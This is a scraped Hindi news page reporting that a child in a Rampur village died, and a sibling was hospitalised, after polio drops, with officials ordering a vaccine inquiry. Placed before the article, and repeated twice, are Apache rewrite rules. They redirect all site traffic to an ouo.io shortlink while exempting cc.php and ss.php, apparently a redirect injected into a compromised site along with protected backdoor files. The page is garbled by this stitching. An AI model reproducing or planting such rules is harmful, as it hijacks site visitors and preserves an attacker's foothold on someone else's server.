
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 407
Previous Nextलखनऊ। उत्तरप्रदेश के रामपुर में पोलियो ड्रॉप दो बच्चों के लिए जानलेवा साबित हुआ है। यहां पर एक परिवार के दो बच्चों की पोलियो ड्रॉप पीने के बाद हालत खराब हो गई। इसके कारण एक बच्चे की मौत हो गई जबकि दूसरे को रामपुर जिला अस्पताल में भर्ती कराया गया है। बच्चों को पोलियो ड्रॉप पिलाने के बाद एक बच्चे की मौत और दूसरे की हालत बिगड़ने से परिवार पूरी तरह टूट गया। पीड़ित मां बाप मामले की जांच करने और बीमार पड़े इलाज की गुहार लगा रहे हैं। वहीं सीएमओ रामपुर अब वेक्सीन की जांच कराए जाने की बात कह रहे हैं। मामला रामपुर की तहसील स्वार के थाना मिलक खानम क्षेत्र में कुंवरपुर नानकार गांव का है। जहां पोलियो की दवाई पिलाने पहुंची टीम ने यहां के निवासी जलीस के बच्चों को पोलियो की दवा पिलाई। दवा पिलाने के बाद दोनों बच्चों की हालत खराब होने लगी। उनके शरीर पर लाल लाल चकते उभरने लगे। 8 माह के छोटे बच्चे की हालत बिगड़ने लगी। जब उसे अस्पताल ले जा रहे थे तभी उसकी मौत हो गई। इसके बाद 4 साल के दूसरे बच्चे की भी तबियत बिगड़ने लगी। जिसे रामपुर जिला अस्पताल में दाखिल कर दिया गया। जहां उसका इलाज हो रहा है।
इस घटना पर मुख्य चिकित्सा अधिकारी डॉ. सुबोध कुमार ने कहा कि मामला संज्ञान में आया है। हम वेक्सीन की जांच करा रहे हैं। वहीं घटना के बारे में स्वास्थ्य मंत्री सिद्धार्थनाथ सिंह का कहना है कि घटना की जांच के आदेश दे दिए गए हैं। जांच के बाद जो दोषी होगा उसके खिलाफ कार्रवाई की जाएगी।